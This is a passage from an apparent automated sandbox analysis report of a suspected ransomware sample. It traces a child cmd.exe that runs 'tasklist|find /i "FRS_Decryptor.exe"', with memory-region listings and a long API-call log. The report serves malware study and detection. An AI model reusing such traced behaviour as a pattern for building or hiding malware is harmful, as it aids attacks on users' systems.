(hMem=0xd27fa0) returned 0x0 [0101.452] IcmpCloseHandle (IcmpHandle=0xd16b48) returned 1 [0101.452] LocalFree (hMem=0xd1c2a0) returned 0x0 [0101.452] LocalFree (hMem=0xd25270) returned 0x0 [0101.452] WSACleanup () returned 0 [0101.452] exit (_Code=0) Thread: id = 269 os_tid = 0x604 Thread: id = 270 os_tid = 0x21c Process: id = "94" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5c6f5000" os_pid = "0x824" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4885 start_va = 0x720000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 4886 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4887 start_va = 0x750000 end_va = 0x75efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4888 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 4889 start_va = 0x7a0000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 4890 start_va = 0x8a0000 end_va = 0x8a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4891 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 4892 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 4893 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4894 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4895 start_va = 0x7fa90000 end_va = 0x7fab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa90000" filename = "" Region: id = 4896 start_va = 0x7fab4000 end_va = 0x7fab4fff entry_point = 0x0 region_type = private name = "private_0x000000007fab4000" filename = "" Region: id = 4897 start_va = 0x7fab8000 end_va = 0x7fab8fff entry_point = 0x0 region_type = private name = "private_0x000000007fab8000" filename = "" Region: id = 4898 start_va = 0x7fabd000 end_va = 0x7fabffff entry_point = 0x0 region_type = private name = "private_0x000000007fabd000" filename = "" Region: id = 4899 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4900 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4901 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4902 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4903 start_va = 0x990000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 4904 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4905 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4906 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4907 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 4908 start_va = 0x8d0000 end_va = 0x94dfff entry_point = 0x8d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4909 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4910 start_va = 0xb80000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 4911 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4912 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4913 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4914 start_va = 0x7f990000 end_va = 0x7fa8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f990000" filename = "" Region: id = 4915 start_va = 0x730000 end_va = 0x733fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 4916 start_va = 0xc80000 end_va = 0xf54fff entry_point = 0xc80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4935 start_va = 0x740000 end_va = 0x743fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Thread: id = 271 os_tid = 0x84c [0101.477] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0101.477] __set_app_type (_Type=0x1) [0101.477] __p__fmode () returned 0x76ea1768 [0101.477] __p__commode () returned 0x76ea176c [0101.477] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0101.477] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0101.478] GetCurrentThreadId () returned 0x84c [0101.478] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x84c) returned 0x34 [0101.478] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0101.478] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0101.478] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.479] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.479] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x89fe08 | out: phkResult=0x89fe08*=0x0) returned 0x2 [0101.486] VirtualQuery (in: lpAddress=0x89fe17, lpBuffer=0x89fdb0, dwLength=0x1c | out: lpBuffer=0x89fdb0*(BaseAddress=0x89f000, AllocationBase=0x7a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0101.486] VirtualQuery (in: lpAddress=0x7a0000, lpBuffer=0x89fdb0, dwLength=0x1c | out: lpBuffer=0x89fdb0*(BaseAddress=0x7a0000, AllocationBase=0x7a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0101.486] VirtualQuery (in: lpAddress=0x7a1000, lpBuffer=0x89fdb0, dwLength=0x1c | out: lpBuffer=0x89fdb0*(BaseAddress=0x7a1000, AllocationBase=0x7a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0101.486] VirtualQuery (in: lpAddress=0x7a3000, lpBuffer=0x89fdb0, dwLength=0x1c | out: lpBuffer=0x89fdb0*(BaseAddress=0x7a3000, AllocationBase=0x7a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0101.486] VirtualQuery (in: lpAddress=0x8a0000, lpBuffer=0x89fdb0, dwLength=0x1c | out: lpBuffer=0x89fdb0*(BaseAddress=0x8a0000, AllocationBase=0x8a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0101.486] GetConsoleOutputCP () returned 0x1b5 [0101.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0101.487] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0101.487] _get_osfhandle (_FileHandle=1) returned 0x260 [0101.487] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0101.487] _get_osfhandle (_FileHandle=1) returned 0x260 [0101.487] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0101.487] _get_osfhandle (_FileHandle=0) returned 0x24 [0101.487] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0101.487] GetEnvironmentStringsW () returned 0xb840c0* [0101.487] FreeEnvironmentStringsA (penv="=") returned 1 [0101.487] GetEnvironmentStringsW () returned 0xb840c0* [0101.487] FreeEnvironmentStringsA (penv="=") returned 1 [0101.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x89ed58 | out: phkResult=0x89ed58*=0x44) returned 0x0 [0101.487] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0xbc, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.487] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x1, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0x1, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x0, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x40, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x40, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0x40, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.488] RegCloseKey (hKey=0x44) returned 0x0 [0101.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x89ed58 | out: phkResult=0x89ed58*=0x44) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0x40, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x1, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0x1, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x0, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x9, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x4, lpData=0x89ed64*=0x9, lpcbData=0x89ed5c*=0x4) returned 0x0 [0101.488] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x89ed60, lpData=0x89ed64, lpcbData=0x89ed5c*=0x1000 | out: lpType=0x89ed60*=0x0, lpData=0x89ed64*=0x9, lpcbData=0x89ed5c*=0x1000) returned 0x2 [0101.488] RegCloseKey (hKey=0x44) returned 0x0 [0101.488] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50090 [0101.488] srand (_Seed=0x5aa50090) [0101.488] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0101.488] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0101.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0101.488] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb840c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0101.488] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.488] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.488] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0101.488] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0101.488] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0101.488] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0101.488] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0101.488] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0101.488] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0101.488] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0101.488] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0101.488] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0101.489] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0101.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x89fb38 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0101.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x89fb38, lpFilePart=0x89fb34 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x89fb34*="Desktop") returned 0x1c [0101.489] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0101.489] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x89f8b0 | out: lpFindFileData=0x89f8b0) returned 0xb842d8 [0101.489] FindClose (in: hFindFile=0xb842d8 | out: hFindFile=0xb842d8) returned 1 [0101.489] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x89f8b0 | out: lpFindFileData=0x89f8b0) returned 0xb842d8 [0101.489] FindClose (in: hFindFile=0xb842d8 | out: hFindFile=0xb842d8) returned 1 [0101.489] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0101.489] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x89f8b0 | out: lpFindFileData=0x89f8b0) returned 0xb842d8 [0101.489] FindClose (in: hFindFile=0xb842d8 | out: hFindFile=0xb842d8) returned 1 [0101.489] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0101.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0101.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0101.489] GetEnvironmentStringsW () returned 0xb86190* [0101.489] FreeEnvironmentStringsA (penv="=") returned 1 [0101.490] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0101.490] GetConsoleOutputCP () returned 0x1b5 [0101.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0101.490] GetUserDefaultLCID () returned 0x409 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x89fc64, cchData=128 | out: lpLCData="0") returned 2 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x89fc64, cchData=128 | out: lpLCData="0") returned 2 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x89fc64, cchData=128 | out: lpLCData="1") returned 2 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0101.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0101.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0101.491] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0101.491] GetConsoleTitleW (in: lpConsoleTitle=0xb84e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.492] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0101.492] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0101.492] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0101.492] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0101.492] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0101.492] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0101.492] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0101.492] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0101.492] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0101.492] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0101.492] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0101.493] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0101.493] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0101.493] _wcsicmp (_String1="IF", _String2="find") returned 3 [0101.493] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0101.493] _wcsicmp (_String1="REM", _String2="find") returned 12 [0101.493] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0101.494] _pipe (in: _PtHandles=0xb851f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xb851f0) returned 0 [0101.494] _dup (_FileHandle=1) returned 5 [0101.494] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0101.494] _close (_FileHandle=4) returned 0 [0101.494] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0101.494] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0101.494] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0101.494] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0101.494] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0101.494] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0101.494] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0101.494] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0101.494] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0101.494] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0101.494] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0101.494] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0101.495] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0101.495] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0101.495] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0101.495] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0101.495] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0101.495] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0101.495] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0101.495] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0101.495] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0101.495] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0101.495] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0101.495] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0101.495] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0101.495] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0101.495] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0101.495] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0101.495] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0101.495] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0101.495] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0101.495] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0101.495] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0101.495] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0101.495] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0101.495] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0101.495] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0101.495] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0101.495] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0101.495] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0101.495] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0101.495] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0101.496] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0101.496] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0101.496] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0101.496] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0101.496] _wcsicmp 